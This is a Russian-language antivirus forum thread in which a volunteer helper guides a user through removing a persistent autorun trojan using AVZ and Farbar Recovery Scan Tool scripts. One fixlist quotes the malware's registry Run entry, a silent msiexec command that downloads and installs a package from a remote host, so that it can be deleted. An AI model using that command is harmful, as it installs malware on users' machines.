KimKem Опубликовано 3 июня, 2017 Опубликовано 3 июня, 2017 Стоит CRSYTAL 13.0.2.558. Начал находить в системной памяти trojan.multi.wmirun.a. После лечения и перезагрузки троян так же обнаруживался. AdwCleaner нашел и удалил ключи реестра(лог S0), но это не помогло. Через 2 дня кристаллом начал обнаруживаться в системной памяти Trojan.Multi.GenAutorunReg.a. AdwCleaner ничего не находит(лог S8). KVRT нашел и удалил Trojan.Multi.GenAutorunReg.a, но кристалл все равно находит этот же троян. Помогите, пожалуйста, решить проблему. AdwCleanerS0.txt AdwCleanerS8.txt CollectionLog-2017.06.03-09.59.zip
thyrex Опубликовано 3 июня, 2017 Опубликовано 3 июня, 2017 Выполните скрипт в AVZ begin RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1'); DeleteFile('C:\Windows\system32\Tasks\Mysa','64'); DeleteFile('C:\Windows\system32\Tasks\Mysa1','64'); DeleteFile('C:\Windows\system32\Tasks\Mysa2','64'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end.Будет выполнена перезагрузка компьютера. Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger
KimKem Опубликовано 3 июня, 2017 Автор Опубликовано 3 июня, 2017 Выполнено CollectionLog-2017.06.03-16.12.zip
thyrex Опубликовано 3 июня, 2017 Опубликовано 3 июня, 2017 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.
thyrex Опубликовано 3 июня, 2017 Опубликовано 3 июня, 2017 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.5b6b7b.ru:280/helloworld.msi /q Task: {36F00225-D323-4C32-BDDC-6EBCA95EE6BF} - \Mysa -> No File <==== ATTENTION Task: {B39EDAFB-4652-46A5-870D-28C937DA7209} - \Mysa1 -> No File <==== ATTENTION Task: {BB552702-DC2A-49A0-BF3B-9410ACA43F0B} - \Mysa2 -> No File <==== ATTENTION AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [134] AlternateDataStreams: C:\Users\Все пользователи\TEMP:B755D674 [134] Reboot: 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание, что будет выполнена перезагрузка компьютера.
KimKem Опубликовано 4 июня, 2017 Автор Опубликовано 4 июня, 2017 Выполнено.Антивирус в системной памяти троянов больше не обнаруживает. Запустил на ночь проверку. Fixlog.txt
thyrex Опубликовано 4 июня, 2017 Опубликовано 4 июня, 2017 Загрузите SecurityCheck by glax24 и сохраните утилиту на Рабочем столе Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10) Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу. Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt Скопируйте содержимое файла в свое следующее сообщение.
KimKem Опубликовано 5 июня, 2017 Автор Опубликовано 5 июня, 2017 (изменено) Полная проверка антивирусом ничего не выявила SecurityCheck.txt Изменено 5 июня, 2017 пользователем KimKem
thyrex Опубликовано 5 июня, 2017 Опубликовано 5 июня, 2017 ------------------------------ [ Windows ] ------------------------------- Internet Explorer 11.0.9600.18537 Внимание! Скачать обновления ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^ Контроль учётных записей пользователя отключен Запрос на повышение прав для администраторов отключен ^Рекомендуется включить: Win+R ввести UserAccountControlSettings и Enter^ --------------------------- [ OtherUtilities ] ---------------------------- WinRAR 5.00 (64-разрядная) v.5.00.0 Внимание! Скачать обновления --------------------------------- [ P2P ] --------------------------------- µTorrent v.3.5.0.43804 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента. ---------------------------- [ UnwantedApps ] ----------------------------- Кнопка "Яндекс" на панели задач v.2.0.0.2116 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии. Исправляйте указанное 1
KimKem Опубликовано 7 июня, 2017 Автор Опубликовано 7 июня, 2017 @thyrex, Спасибо Вам, от всей души, за помощь.
Andy707 Опубликовано 7 августа, 2017 Опубликовано 7 августа, 2017 Здравствуйте. Не могу удалить Trojan.Multi.GenAutorunReg.aФайлы отчетов прикрепляю в Farbar Recovery Scan Tool report.rar
regist Опубликовано 7 августа, 2017 Опубликовано 7 августа, 2017 @Andy707, Порядок оформления запроса о помощиОсобенно внимательно пункт №3 прочитайте.
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти